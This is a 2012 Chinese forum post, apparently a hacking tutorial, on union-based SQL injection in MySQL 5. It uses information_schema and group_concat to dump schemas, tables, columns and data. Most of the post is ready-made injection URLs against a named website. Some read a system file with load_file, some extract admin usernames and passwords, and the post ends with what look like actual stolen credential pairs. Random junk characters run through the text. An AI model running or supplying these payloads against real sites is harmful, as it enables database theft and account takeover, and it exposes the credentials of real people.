此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似7 J3 s% b' f# K
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人/ Q7 E. I% `( I2 o2 k" \# S/ [9 C
) Q) S% B1 Z. j) g0 |% a7 ^$ h2 P1 L3 ?+ U' F" @; }
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入; j8 w8 n P$ A* j7 g1 g- H
9 B! j; R6 Q- ]9 A缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢..., E( ~+ L) @' K5 y; r
, [+ B9 w: Z% A6 l
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
$ Y' E4 s" v3 _; I1 p l& h2 r( u在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等% h4 K; h1 K' L3 _- v5 l6 Z0 y
) B9 V3 K; X/ A7 O/ N) ~% Z
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17! a5 P. q& M3 \ k6 b
. ^6 J0 i7 `; ?1 K! g
读出所有库:
% W" f) X [5 _, A2 @1 t0 Vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
4 ]% d3 ^- d1 G* f" H
+ D7 O2 V- p0 I. N7 m( [( B
# v4 |0 y( F. F/ F4 ]6 Q& C$ R' T& s; Z7 S
读出所有表:
. `, Y& K' r8 g- _2 bhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()* F9 \: Z. t I7 H2 e$ v0 `
( P# u' O" t7 R' m8 _+ Q
读出所有表字段:
$ B$ T: I* U( J4 Hhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)6 k4 {* B* s/ D- W
*/ (97,100,109,105,110)为admin的ascii码 依次类推
6 T. T9 u, v! c3 ^, O+ w8 T3 e0 S" s! O8 H! }; z
读出所有表字段里的内容:
* n1 w- q; \- P, p, q2 Y- Rhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
I2 \9 l/ [6 q0 y1 k9 F `
$ f" q, R6 n9 J/ t6 G+ M, l. Y) D. c9 A+ d9 p& k
$ E6 N1 n. R1 e! S3 E# r5 r- P0 M" ?( k3 e
( m7 N/ a @6 |- _0 j" n( d
1 F6 u/ P% r( a: h& Bhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
- ~; ^* `! k4 L
+ a- V1 f$ d, N m* \/ m5 W# ]
# S* j# S; x" f% j/ Ahttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
7 M7 [6 i. K: O# P$ R( n2 _$ r/ a2 O" H, K2 |/ s
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23' Q- n2 q: V+ Z* K; V V/ F9 j
/ i2 o( d! W- \) `! A
7 d* h- ]2 }& H$ V5 L! E) U* \
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23; X* O8 U+ I& j; X( A* H
7 p; I- y* }) a. d" x
2 y8 T+ }9 J1 d A0 \; t @; p. A webmaster:dzb521123,simlab:simadmin20043233
; d7 A% v- O8 k, n j |
发表于 2012-9-13 16:37:34
收藏
支持
反对